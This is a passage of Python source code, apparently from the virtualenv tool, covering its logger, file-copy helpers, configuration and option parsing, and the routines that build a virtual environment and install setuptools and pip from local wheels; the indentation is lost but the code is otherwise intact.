% (msg, self.in_progress))
if self.level_matches(self.NOTIFY, self._stdout_level()):
sys.stdout.write(msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self.stdout_level_matches(self.NOTIFY):
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
sys.stdout.write('.')
sys.stdout.flush()
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
>>> l = Logger([])
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
if stop is not None and stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
#@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
level_for_integer = classmethod(level_for_integer)
# create a silent logger just to prevent this from being undefined
# will be overridden with requested verbosity main() is called.
logger = Logger([(Logger.LEVELS[-1], sys.stdout)])
def mkdir(path):
if not os.path.exists(path):
logger.info('Creating %s', path)
os.makedirs(path)
else:
logger.info('Directory %s already exists', path)
def copyfileordir(src, dest, symlink=True):
if os.path.isdir(src):
shutil.copytree(src, dest, symlink)
else:
shutil.copy2(src, dest)
def copyfile(src, dest, symlink=True):
if not os.path.exists(src):
# Some bad symlink in the src
logger.warn('Cannot find file %s (bad symlink)', src)
return
if os.path.exists(dest):
logger.debug('File %s already exists', dest)
return
if not os.path.exists(os.path.dirname(dest)):
logger.info('Creating parent directories for %s', os.path.dirname(dest))
os.makedirs(os.path.dirname(dest))
if not os.path.islink(src):
srcpath = os.path.abspath(src)
else:
srcpath = os.readlink(src)
if symlink and hasattr(os, 'symlink') and not is_win:
logger.info('Symlinking %s', dest)
try:
os.symlink(srcpath, dest)
except (OSError, NotImplementedError):
logger.info('Symlinking failed, copying to %s', dest)
copyfileordir(src, dest, symlink)
else:
logger.info('Copying to %s', dest)
copyfileordir(src, dest, symlink)
def writefile(dest, content, overwrite=True):
if not os.path.exists(dest):
logger.info('Writing %s', dest)
f = open(dest, 'wb')
f.write(content.encode('utf-8'))
f.close()
return
else:
f = open(dest, 'rb')
c = f.read()
f.close()
if c != content.encode("utf-8"):
if not overwrite:
logger.notify('File %s exists with different content; not overwriting', dest)
return
logger.notify('Overwriting %s with new content', dest)
f = open(dest, 'wb')
f.write(content.encode('utf-8'))
f.close()
else:
logger.info('Content %s already in place', dest)
def rmtree(dir):
if os.path.exists(dir):
logger.notify('Deleting tree %s', dir)
shutil.rmtree(dir)
else:
logger.info('Do not need to delete %s; already gone', dir)
def make_exe(fn):
if hasattr(os, 'chmod'):
oldmode = os.stat(fn).st_mode & 0xFFF # 0o7777
newmode = (oldmode | 0x16D) & 0xFFF # 0o555, 0o7777
os.chmod(fn, newmode)
logger.info('Changed mode of %s to %s', fn, oct(newmode))
def _find_file(filename, dirs):
for dir in reversed(dirs):
files = glob.glob(os.path.join(dir, filename))
if files and os.path.isfile(files[0]):
return True, files[0]
return False, filename
def file_search_dirs():
here = os.path.dirname(os.path.abspath(__file__))
dirs = [here, join(here, 'virtualenv_support')]
if os.path.splitext(os.path.dirname(__file__))[0] != 'virtualenv':
# Probably some boot script; just in case virtualenv is installed...
try:
import virtualenv
except ImportError:
pass
else:
dirs.append(os.path.join(
os.path.dirname(virtualenv.__file__), 'virtualenv_support'))
return [d for d in dirs if os.path.isdir(d)]
class UpdatingDefaultsHelpFormatter(optparse.IndentedHelpFormatter):
"""
Custom help formatter for use in ConfigOptionParser that updates
the defaults before expanding them, allowing them to show up correctly
in the help listing
"""
def expand_default(self, option):
if self.parser is not None:
self.parser.update_defaults(self.parser.defaults)
return optparse.IndentedHelpFormatter.expand_default(self, option)
class ConfigOptionParser(optparse.OptionParser):
"""
Custom option parser which updates its defaults by checking the
configuration files and environmental variables
"""
def __init__(self, *args, **kwargs):
self.config = ConfigParser.RawConfigParser()
self.files = self.get_config_files()
self.config.read(self.files)
optparse.OptionParser.__init__(self, *args, **kwargs)
def get_config_files(self):
config_file = os.environ.get('VIRTUALENV_CONFIG_FILE', False)
if config_file and os.path.exists(config_file):
return [config_file]
return [default_config_file]
def update_defaults(self, defaults):
"""
Updates the given defaults with values from the config files and
the environ. Does a little special handling for certain types of
options (lists).
"""
# Then go and look for the other sources of configuration:
config = {}
# 1. config files
config.update(dict(self.get_config_section('virtualenv')))
# 2. environmental variables
config.update(dict(self.get_environ_vars()))
# Then set the options with those values
for key, val in config.items():
key = key.replace('_', '-')
if not key.startswith('--'):
key = '--%s' % key # only prefer long opts
option = self.get_option(key)
if option is not None:
# ignore empty values
if not val:
continue
# handle multiline configs
if option.action == 'append':
val = val.split()
else:
option.nargs = 1
if option.action == 'store_false':
val = not strtobool(val)
elif option.action in ('store_true', 'count'):
val = strtobool(val)
try:
val = option.convert_value(key, val)
except optparse.OptionValueError:
e = sys.exc_info()[1]
print("An error occurred during configuration: %s" % e)
sys.exit(3)
defaults[option.dest] = val
return defaults
def get_config_section(self, name):
"""
Get a section of a configuration
"""
if self.config.has_section(name):
return self.config.items(name)
return []
def get_environ_vars(self, prefix='VIRTUALENV_'):
"""
Returns a generator with all environmental vars with prefix VIRTUALENV
"""
for key, val in os.environ.items():
if key.startswith(prefix):
yield (key.replace(prefix, '').lower(), val)
def get_default_values(self):
"""
Overridding to make updating the defaults after instantiation of
the option parser possible, update_defaults() does the dirty work.
"""
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return optparse.Values(self.defaults)
defaults = self.update_defaults(self.defaults.copy()) # ours
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, basestring):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return optparse.Values(defaults)
def main():
parser = ConfigOptionParser(
version=virtualenv_version,
usage="%prog [OPTIONS] DEST_DIR",
formatter=UpdatingDefaultsHelpFormatter())
parser.add_option(
'-v', '--verbose',
action='count',
dest='verbose',
default=0,
help="Increase verbosity.")
parser.add_option(
'-q', '--quiet',
action='count',
dest='quiet',
default=0,
help='Decrease verbosity.')
parser.add_option(
'-p', '--python',
dest='python',
metavar='PYTHON_EXE',
help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 '
'interpreter to create the new environment. The default is the interpreter that '
'virtualenv was installed with (%s)' % sys.executable)
parser.add_option(
'--clear',
dest='clear',
action='store_true',
help="Clear out the non-root install and start from scratch.")
parser.set_defaults(system_site_packages=False)
parser.add_option(
'--no-site-packages',
dest='system_site_packages',
action='store_false',
help="DEPRECATED. Retained only for backward compatibility. "
"Not having access to global site-packages is now the default behavior.")
parser.add_option(
'--system-site-packages',
dest='system_site_packages',
action='store_true',
help="Give the virtual environment access to the global site-packages.")
parser.add_option(
'--always-copy',
dest='symlink',
action='store_false',
default=True,
help="Always copy files rather than symlinking.")
parser.add_option(
'--unzip-setuptools',
dest='unzip_setuptools',
action='store_true',
help="Unzip Setuptools when installing it.")
parser.add_option(
'--relocatable',
dest='relocatable',
action='store_true',
help='Make an EXISTING virtualenv environment relocatable. '
'This fixes up scripts and makes all .pth files relative.')
parser.add_option(
'--no-setuptools',
dest='no_setuptools',
action='store_true',
help='Do not install setuptools (or pip) in the new virtualenv.')
parser.add_option(
'--no-pip',
dest='no_pip',
action='store_true',
help='Do not install pip in the new virtualenv.')
parser.add_option(
'--no-wheel',
dest='no_wheel',
action='store_true',
help='Do not install wheel in the new virtualenv.')
default_search_dirs = file_search_dirs()
parser.add_option(
'--extra-search-dir',
dest="search_dirs",
action="append",
metavar='DIR',
default=default_search_dirs,
help="Directory to look for setuptools/pip distributions in. "
"This option can be used multiple times.")
parser.add_option(
'--never-download',
dest="never_download",
action="store_true",
default=True,
help="DEPRECATED. Retained only for backward compatibility. This option has no effect. "
"Virtualenv never downloads pip or setuptools.")
parser.add_option(
'--prompt',
dest='prompt',
help='Provides an alternative prompt prefix for this environment.')
parser.add_option(
'--setuptools',
dest='setuptools',
action='store_true',
help="DEPRECATED. Retained only for backward compatibility. This option has no effect.")
parser.add_option(
'--distribute',
dest='distribute',
action='store_true',
help="DEPRECATED. Retained only for backward compatibility. This option has no effect.")
if 'extend_parser' in globals():
extend_parser(parser)
options, args = parser.parse_args()
global logger
if 'adjust_options' in globals():
adjust_options(options, args)
verbosity = options.verbose - options.quiet
logger = Logger([(Logger.level_for_integer(2 - verbosity), sys.stdout)])
if options.python and not os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
env = os.environ.copy()
interpreter = resolve_interpreter(options.python)
if interpreter == sys.executable:
logger.warn('Already using interpreter %s' % interpreter)
else:
logger.notify('Running virtualenv with interpreter %s' % interpreter)
env['VIRTUALENV_INTERPRETER_RUNNING'] = 'true'
file = __file__
if file.endswith('.pyc'):
file = file[:-1]
popen = subprocess.Popen([interpreter, file] + sys.argv[1:], env=env)
raise SystemExit(popen.wait())
if not args:
print('You must provide a DEST_DIR')
parser.print_help()
sys.exit(2)
if len(args) > 1:
print('There must be only one argument: DEST_DIR (you gave %s)' % (
' '.join(args)))
parser.print_help()
sys.exit(2)
home_dir = args[0]
if os.environ.get('WORKING_ENV'):
logger.fatal('ERROR: you cannot run virtualenv while in a workingenv')
logger.fatal('Please deactivate your workingenv, then re-run this script')
sys.exit(3)
if 'PYTHONHOME' in os.environ:
logger.warn('PYTHONHOME is set. You *must* activate the virtualenv before using it')
del os.environ['PYTHONHOME']
if options.relocatable:
make_environment_relocatable(home_dir)
return
if not options.never_download:
logger.warn('The --never-download option is for backward compatibility only.')
logger.warn('Setting it to false is no longer supported, and will be ignored.')
create_environment(home_dir,
site_packages=options.system_site_packages,
clear=options.clear,
unzip_setuptools=options.unzip_setuptools,
prompt=options.prompt,
search_dirs=options.search_dirs,
never_download=True,
no_setuptools=options.no_setuptools,
no_pip=options.no_pip,
no_wheel=options.no_wheel,
symlink=options.symlink)
if 'after_install' in globals():
after_install(options, home_dir)
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True, extra_env=None,
remove_from_env=None):
cmd_parts = []
for part in cmd:
if len(part) > 45:
part = part[:20]+"..."+part[-20:]
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
if hasattr(part, 'decode'):
try:
part = part.decode(sys.getdefaultencoding())
except UnicodeDecodeError:
part = part.decode(sys.getfilesystemencoding())
cmd_parts.append(part)
cmd_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.debug("Running command %s" % cmd_desc)
if extra_env or remove_from_env:
env = os.environ.copy()
if extra_env:
env.update(extra_env)
if remove_from_env:
for varname in remove_from_env:
env.pop(varname, None)
else:
env = None
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception:
e = sys.exc_info()[1]
logger.fatal(
"Error %s while executing command %s" % (e, cmd_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
encoding = sys.getdefaultencoding()
fs_encoding = sys.getfilesystemencoding()
while 1:
line = stdout.readline()
try:
line = line.decode(encoding)
except UnicodeDecodeError:
line = line.decode(fs_encoding)
if not line:
break
line = line.rstrip()
all_output.append(line)
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
proc.communicate()
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % cmd_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise OSError(
"Command %s failed with error code %s"
% (cmd_desc, proc.returncode))
else:
logger.warn(
"Command %s had error code %s"
% (cmd_desc, proc.returncode))
def filter_install_output(line):
if line.strip().startswith('running'):
return Logger.INFO
return Logger.DEBUG
def find_wheels(projects, search_dirs):
"""Find wheels from which we can import PROJECTS.
Scan through SEARCH_DIRS for a wheel for each PROJECT in turn. Return
a list of the first wheel found for each PROJECT
"""
wheels = []
# Look through SEARCH_DIRS for the first suitable wheel. Don't bother
# about version checking here, as this is simply to get something we can
# then use to install the correct version.
for project in projects:
for dirname in search_dirs:
# This relies on only having "universal" wheels available.
# The pattern could be tightened to require -py2.py3-none-any.whl.
files = glob.glob(os.path.join(dirname, project + '-*.whl'))
if files:
wheels.append(os.path.abspath(files[0]))
break
else:
# We're out of luck, so quit with a suitable error
logger.fatal('Cannot find a wheel for %s' % (project,))
return wheels
def install_wheel(project_names, py_executable, search_dirs=None):
if search_dirs is None:
search_dirs = file_search_dirs()
wheels = find_wheels(['setuptools', 'pip'], search_dirs)
pythonpath = os.pathsep.join(wheels)
findlinks = ' '.join(search_dirs)
cmd = [
py_executable, '-c',
'import sys, pip; sys.exit(pip.main(["install", "--ignore-installed"] + sys.argv[1:]))',
] + project_names
logger.start_progress('Installing %s...' % (', '.join(project_names)))
logger.indent += 2
try:
call_subprocess(cmd, show_stdout=False,
extra_env = {
'PYTHONPATH': pythonpath,
'JYTHONPATH': pythonpath, # for Jython < 3.x
'PIP_FIND_LINKS': findlinks,
'PIP_USE_WHEEL': '1',
'PIP_PRE': '1',
'PIP_NO_INDEX': '1'
}
)
finally:
logger.indent -= 2
logger.end_progress()
def create_environment(home_dir, site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, no_wheel=False,
symlink=True):
"""
Creates a new environment in ``home_dir``.
If ``site_packages`` is true, then the global ``site-packages/``
directory will be on the path.
If ``clear`` is true (default False) then the environment will
first be cleared.
"""
home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)
py_executable = os.path.abspath(install_python(
home_dir, lib_dir, inc_dir, bin_dir,
site_packages=site_packages, clear=clear, symlink=symlink))
install_distutils(home_dir)
if not no_setuptools:
to_install = ['setuptools']
if not no_pip:
to_install.append('pip')
if not no_wheel:
to_install.append('wheel')
install_wheel(to_install, py_executable, search_dirs)
install_activate(home_dir, bin_dir, prompt)
def is_executable_file(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
def path_locations(home_dir):
"""Return the path locations for the environment (where libraries are,
where scripts go, etc)"""
# XXX: We'd use distutils.sysconfig.get_python_inc/lib but its
# prefix arg is broken: http://bugs.python.org/issue3386
if is_win:
# Windows has lots of problems with executables with spaces in
# the name; this function will remove them (using the ~1
# format):
mkdir(home_dir)
if ' ' in home_dir:
import ctypes
GetShortPathName = ctypes.windll.kernel32.GetShortPathNameW
size = max(len(home_dir)+1, 256)
buf = ctypes.create_unicode_buffer(size)
try:
u = unicode
except NameError:
u = str
ret = GetShortPathName(u(home_dir), buf, size)
if not ret:
print('Error: the path "%s" has a space in it' % home_dir)
print('We could not determine the short pathname for it.')
print('Exiting.')
sys.exit(3)
home_dir = str(buf.value)
lib_dir = join(home_dir, 'Lib')
inc_dir = join(home_dir, 'Include')
bin_dir = join(home_dir, 'Scripts')
if is_jython:
lib_dir = join(home_dir, 'Lib')
inc_dir = join(home_dir, 'Include')
bin_dir = join(home_dir, 'bin')
elif is_pypy:
lib_dir = home_dir
inc_dir = join(home_dir, 'include')
bin_dir = join(home_dir, 'bin')
elif not is_win:
lib_dir = join(home_dir, 'lib', py_version)
multiarch_exec = '/usr/bin/multiarch-platform'
if is_executable_file(multiarch_exec):
# In Mageia (2) and Mandriva distros the include dir must be like:
# virtualenv/include/multiarch-x86_64-linux/python2.7
# instead of being virtualenv/include/python2.7
p = subprocess.Popen(multiarch_exec, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
# stdout.strip is needed to remove newline character
inc_dir = join(home_dir, 'include', stdout.strip(), py_version + abiflags)
else:
inc_dir = join(home_dir, 'include', py_version + abiflags)
bin_dir = join(home_dir, 'bin')
return home_dir, lib_dir, inc_dir, bin_dir
def change_prefix(filename, dst_prefix):
prefixes = [sys.prefix]
if is_darwin:
prefixes.extend((
os.path.join("/Library/Python", sys.version[:3], "site-packages"),
os.path.join(sys.prefix, "Extras", "lib", "python"),
os.path.join("~", "Library", "Python", sys.version[:3], "site-packages"),
# Python 2.6 no-frameworks
os.path.join("~", ".local", "lib","python", sys.version[:3], "site-packages"),
# System Python 2.7 on OSX Mountain Lion
os.path.join("~", "Library", "Python", sys.version[:3], "lib", "python", "site-packages")))
if hasattr(sys, 'real_prefix'):
prefixes.append(sys.real_prefix)
if hasattr(sys, 'base_prefix'):
prefixes.append(sys.base_prefix)
prefixes = list(map(os.path.expanduser, prefixes))
prefixes = list(map(os.path.abspath, prefixes))
# Check longer prefixes first so we don't split in the middle of a filename
prefixes = sorted(prefixes, key=len, reverse=True)
filename = os.path.abspath(filename)
for src_prefix in prefixes:
if filename.startswith(src_prefix):
_, relpath = filename.split(src_prefix, 1)
if src_prefix != os.sep: # sys.prefix == "/"
assert relpath[0] == os.sep
relpath = relpath[1:]
return join(dst_prefix, relpath)
assert False, "Filename %s does not start with any of these prefixes: %s" % \
(filename, prefixes)
def copy_required_modules(dst_prefix, symlink):
import imp
# If we are running under -p, we need to remove the current
# directory from sys.path temporarily here, so that we
# definitely get the modules from the site directory of
# the interpreter we are running under, not the one
# virtualenv.py is installed under (which might lead to py2/py3
# incompatibility issues)
_prev_sys_path = sys.path
if os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
sys.path = sys.path[1:]
try:
for modname in REQUIRED_MODULES:
if modname in sys.builtin_module_names:
logger.info("Ignoring built-in bootstrap module: %s" % modname)
continue
try:
f, filename, _ = imp.find_module(modname)
except ImportError:
logger.info("Cannot import bootstrap module: %s" % modname)
else:
if f is not None:
f.close()
# special-case custom readline.so on OS X, but not for pypy:
if modname == 'readline' and sys.platform == 'darwin' and not (
is_pypy or filename.endswith(join('lib-dynload', 'readline.so'))):
dst_filename = join(dst_prefix, 'lib', 'python%s' % sys.version[:3], 'readline.so')
elif modname == 'readline' and sys.platform == 'win32':
# special-case for Windows, where readline is not a
# standard module, though it may have been installed in
# site-packages by a third-party package
pass
else:
dst_filename = change_prefix(filename, dst_prefix)
copyfile(filename, dst_filename, symlink)
if filename.endswith('.pyc'):
pyfile = filename[:-1]
if os.path.exists(pyfile):
copyfile(pyfile, dst_filename[:-1], symlink)
finally:
sys.path = _prev_sys_path
def subst_path(prefix_path, prefix, home_dir):
prefix_path = os.path.normpath(prefix_path)
prefix = os.path.normpath(prefix)
home_dir = os.path.normpath(home_dir)
if not prefix_path.startswith(prefix):
logger.warn('Path not in prefix %r %r', prefix_path, prefix)
return
return prefix_path.replace(prefix, home_dir, 1)
def install_python(home_dir, lib_dir, inc_dir, bin_dir, site_packages, clear, symlink=True):
"""Install just the base environment, no distutils patches etc"""
if sys.executable.startswith(bin_dir):
print('Please use the *system* python to run this script')
return
if clear:
rmtree(lib_dir)
## FIXME: why not delete it?
## Maybe it should delete everything with #!/path/to/venv/python in it
logger.notify('Not deleting %s', bin_dir)
if hasattr(sys, 'real_prefix'):
logger.notify('Using real prefix %r' % sys.real_prefix)
prefix = sys.real_prefix
elif hasattr(sys, 'base_prefix'):
logger.notify('Using base prefix %r' % sys.base_prefix)
prefix = sys.base_prefix
else:
prefix = sys.prefix
mkdir(lib_dir)
fix_lib64(lib_dir, symlink)
stdlib_dirs = [os.path.dirname(os.__file__)]
if is_win:
stdlib_dirs.append(join(os.path.dirname(stdlib_dirs[0]), 'DLLs'))
elif is_darwin:
stdlib_dirs.append(join(stdlib_dirs[0], 'site-packages'))
if hasattr(os, 'symlink'):
logger.info('Symlinking Python bootstrap modules')
else:
logger.info('Copying Python bootstrap modules')
logger.indent += 2
try:
# copy required files...
for stdlib_dir in stdlib_dirs:
if not os.path.isdir(stdlib_dir):
continue
for fn in os.listdir(stdlib_dir):
bn = os.path.splitext(fn)[0]
if fn != 'site-packages' and bn in REQUIRED_FILES:
copyfile(join(stdlib_dir, fn), join(lib_dir, fn), symlink)
# ...and modules
copy_required_modules(home_dir, symlink)
finally:
logger.indent -= 2
mkdir(join(lib_dir, 'site-packages'))
import site
site_filename = site.__file__
if site_filename.endswith('.pyc'):
site_filename = site_filename[:-1]
elif site_filename.endswith('$py.class'):
site_filename = site_filename.replace('$py.class', '.py')
site_filename_dst = change_prefix(site_filename, home_dir)
site_dir = os.path.dirname(site_filename_dst)
writefile(site_filename_dst, SITE_PY)
writefile(join(site_dir, 'orig-prefix.txt'), prefix)
site_packages_filename = join(site_dir, 'no-global-site-packages.txt')
if not site_packages:
writefile(site_packages_filename, '')
if is_pypy or is_win:
stdinc_dir = join(prefix, 'include')
else:
stdinc_dir = join(prefix, 'include', py_version + abiflags)
if os.path.exists(stdinc_dir):
copyfile(stdinc_dir, inc_dir, symlink)
else:
logger.debug('No include dir %s' % stdinc_dir)
platinc_dir = distutils.sysconfig.get_python_inc(plat_specific=1)
if platinc_dir != stdinc_dir:
platinc_dest = distutils.sysconfig.get_python_inc(
plat_specific=1, prefix=home_dir)
if platinc_dir == platinc_dest:
# Do platinc_dest manually due to a CPython bug;
# not http://bugs.python.org/issue3386 but a close cousin
platinc_dest = subst_path(platinc_dir, prefix, home_dir)
if platinc_dest:
# PyPy's stdinc_dir and prefix are relative to the original binary
# (traversing virtualenvs), whereas the platinc_dir is relative to
# the inner virtualenv and ignores the prefix argument.
# This seems more evolved than designed.
copyfile(platinc_dir, platinc_dest, symlink)
# pypy never uses exec_prefix, just ignore it
if sys.exec_prefix != prefix and not is_pypy:
if is_win:
exec_dir = join(sys.exec_prefix, 'lib')
elif is_jython:
exec_dir = join(sys.exec_prefix, 'Lib')
else:
exec_dir = join(sys.exec_prefix, 'lib', py_version)
for fn in os.listdir(exec_dir):
copyfile(join(exec_dir, fn), join(lib_dir, fn), symlink)
if is_jython:
# Jython has either jython-dev.jar and javalib/ dir, or just
# jython.jar
for name in 'jython-dev.jar', 'javalib', 'jython.jar':
src = join(prefix, name)
if os.path.exists(src):
copyfile(src, join(home_dir, name), symlink)
# XXX: registry should always exist after Jython 2.5rc1
src = join(prefix, 'registry')
if os.path.exists(src):
copyfile(src, join(home_dir, 'registry'), symlink=False)
copyfile(join(prefix, 'cachedir'), join(home_dir, 'cachedir'),
symlink=False)
mkdir(bin_dir)
py_executable = join(bin_dir, os.path.basename(sys.executable))
if 'Python.framework' in prefix:
# OS X framework builds cause validation to break
# https://github.com/pypa/virtualenv/issues/322
if os.environ.get('__PYVENV_LAUNCHER__'):
del os.environ["__PYVENV_LAUNCHER__"]
if re.search(r'/Python(?:-32|-64)*$', py_executable):
# The name of the python executable is not quite what
# we want, rename it.
py_executable = os.path.join(
os.path.dirname(py_executable), 'python')
logger.notify('New %s executable in %s', expected_exe, py_executable)
pcbuild_dir = os.path.dirname(sys.executable)
pyd_pth = os.path.join(lib_dir, 'site-packages', 'virtualenv_builddir_pyd.pth')
if is_win and os.path.exists(os.path.join(pcbuild_dir, 'build.bat')):
logger.notify('Detected python running from build directory %s', pcbuild_dir)
logger.notify('Writing .pth file linking to build directory for *.pyd files')
writefile(pyd_pth, pcbuild_dir)
else:
pcbuild_dir = None
if os.path.exists(pyd_pth):
logger.info('Deleting %s (not Windows env or not build directory python)' % pyd_pth)
os.unlink(pyd_pth)
if sys.executable != py_executable:
## FIXME: could I just hard link?
executable = sys.executable
shutil.copyfile(executable, py_executable)
make_exe(py_executable)
if is_win or is_cygwin:
pythonw = os.path.join(os.path.dirname(sys.executable), 'pythonw.exe')
if os.path.exists(pythonw):
logger.info('Also created pythonw.exe')
shutil.copyfile(pythonw, os.path.join(os.path.dirname(py_executable), 'pythonw.exe'))
python_d = os.path.join(os.path.dirname(sys.executable), 'python_d.exe')
python_d_dest = os.path.join(os.path.dirname(py_executable), 'python_d.exe')
if os.path.exists(python_d):
logger.info('Also created python_d.exe')
shutil.copyfile(python_d, python_d_dest)
elif os.path.exists(python_d_dest):
logger.info('Removed python_d.exe as it is no longer at the source')
os.unlink(python_d_dest)
# we need to copy the DLL to enforce that windows will load the correct one.
# may not exist if we are cygwin.
py_executable_dll = 'python%s%s.dll' % (
sys.version_info[0], sys.version_info[1])
py_executable_dll_d = 'python%s%s_d.dll' % (
sys.version_info[0], sys.version_info[1])
pythondll = os.path.join(os.path.dirname(sys.executable), py_executable_dll)
pythondll_d = os.path.join(os.path.dirname(sys.executable), py_executable_dll_d)
pythondll_d_dest = os.path.join(os.path.dirname(py_executable), py_executable_dll_d)
if os.path.exists(pythondll):
logger.info('Also created %s' % py_executable_dll)
shutil.copyfile(pythondll, os.path.join(os.path.dirname(py_executable), py_executable_dll))
if os.path.exists(pythondll_d):
logger.info('Also created %s' % py_executable_dll_d)
shutil.copyfile(pythondll_d, pythondll_d_dest)
elif os.path.exists(pythondll_d_dest):
logger.info('Removed %s as the source does not exist' % pythondll_d_dest)
os.unlink(pythondll_d_dest)
if is_pypy:
# make a symlink python --> pypy-c
python_executable = os.path.join(os.path.dirname(py_executable), 'python')
if sys.platform in ('win32', 'cygwin'):
python_executable += '.exe'
logger.info('Also created executable %s' % python_executable)
copyfile(py_executable, python_executable, symlink)
if is_win:
for name in ['libexpat.dll', 'libpypy.dll', 'libpypy-c.dll',
'libeay32.dll', 'ssleay32.dll', 'sqlite3.dll',
'tcl85.dll', 'tk85.dll']:
src = join(prefix, name)
if os.path.exists(src):
copyfile(src, join(bin_dir, name), symlink)
for d in sys.path:
if d.endswith('lib_pypy'):
break
else:
logger.fatal('Could not find lib_pypy in sys.path')
raise SystemExit(3)
logger.info('Copying lib_pypy')
copyfile(d, os.path.join(home_dir, 'lib_pypy'), symlink)
if os.path.splitext(os.path.basename(py_executable))[0] != expected_exe:
secondary_exe = os.path.join(os.path.dirname(py_executable),
expected_exe)
py_executable_ext = os.path.splitext(py_executable)[1]
if py_executable_ext.lower() == '.exe':
# python2.4 gives an extension of '.4' :P
secondary_exe += py_executable_ext
if os.path.exists(secondary_exe):
logger.warn('Not overwriting existing %s script %s (you must use %s)'
% (expected_exe, secondary_exe, py_executable))
else:
logger.notify('Also creating executable in %s' % secondary_exe)
shutil.copyfile(sys.executable, secondary_exe)
make_exe(secondary_exe)
if '.framework' in prefix:
if 'Python.framework' in prefix:
logger.debug('MacOSX Python framework detected')
# Make sure we use the embedded interpreter inside
# the framework, even if sys.executable points to
# the stub executable in ${sys.prefix}/bin
# See http://groups.google.com/group/python-virtualenv/
# browse_thread/thread/17cab2f85da75951
original_python = os.path.join(
prefix, 'Resources/Python.app/Contents/MacOS/Python')
if 'EPD' in prefix:
logger.debug('EPD framework detected')
original_python = os.path.join(prefix, 'bin/python')
shutil.copy(original_python, py_executable)
# Copy the framework's dylib into the virtual
# environment
virtual_lib = os.path.join(home_dir, '.Python')
if os.path.exists(virtual_lib):
os.unlink(virtual_lib)
copyfile(
os.path.join(prefix, 'Python'),
virtual_lib,
symlink)
# And then change the install_name of the copied python executable
try:
mach_o_change(py_executable,
os.path.join(prefix, 'Python'),
'@executable_path/../.Python')
except:
e = sys.exc_info()[1]
logger.warn("Could not call mach_o_change: %s. "
"Trying to call install_name_tool instead." % e)
try:
call_subprocess(
["install_name_tool", "-change",
os.path.join(prefix, 'Python'),
'@executable_path/../.Python',
py_executable])
except:
logger.fatal("Could not call install_name_tool -- you must "
"have Apple's development tools installed")
raise
if not is_win:
# Ensure that 'python', 'pythonX' and 'pythonX.Y' all exist
py_exe_version_major = 'python%s' % sys.version_info[0]
py_exe_version_major_minor = 'python%s.%s' % (
sys.version_info[0], sys.version_info[1])
py_exe_no_version = 'python'
required_symlinks = [ py_exe_no_version, py_exe_version_major,
py_exe_version_major_minor ]
py_executable_base = os.path.basename(py_executable)
if py_executable_base in required_symlinks:
# Don't try to symlink to yourself.
required_symlinks.remove(py_executable_base)
for pth in required_symlinks:
full_pth = join(bin_dir, pth)
if os.path.exists(full_pth):
os.unlink(full_pth)
if symlink:
os.symlink(py_executable_base, full_pth)
else:
copyfile(py_executable, full_pth, symlink)
if is_win and ' ' in py_executable:
# There's a bug with subprocess on Windows when using a first
# argument that has a space in it. Instead we have to quote
# the value:
py_executable = '"%s"' % py_executable
# NOTE: keep this check as one line, cmd.exe doesn't cope with line breaks
cmd = [py_executable, '-c', 'import sys;out=sys.stdout;'
'getattr(out, "buffer", out).write(sys.prefix.encode("utf-8"))']
logger.info('Testing executable with %s %s "%s"' % tuple(cmd))
try:
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE)
proc_stdout, proc_stderr = proc.communicate()
except OSError:
e = sys.exc_info()[1]
if e.errno == errno.EACCES:
logger.fatal('ERROR: The executable %s could not be run: %s' % (py_executable, e))
sys.exit(100)
else:
raise e
proc_stdout = proc_stdout.strip().decode("utf-8")
proc_stdout = os.path.normcase(os.path.abspath(proc_stdout))
norm_home_dir = os.path.normcase(os.path.abspath(home_dir))
if hasattr(norm_home_dir, 'decode'):
norm_home_dir = norm_home_dir.decode(sys.getfilesystemencoding())
if proc_stdout != norm_home_dir:
logger.fatal(
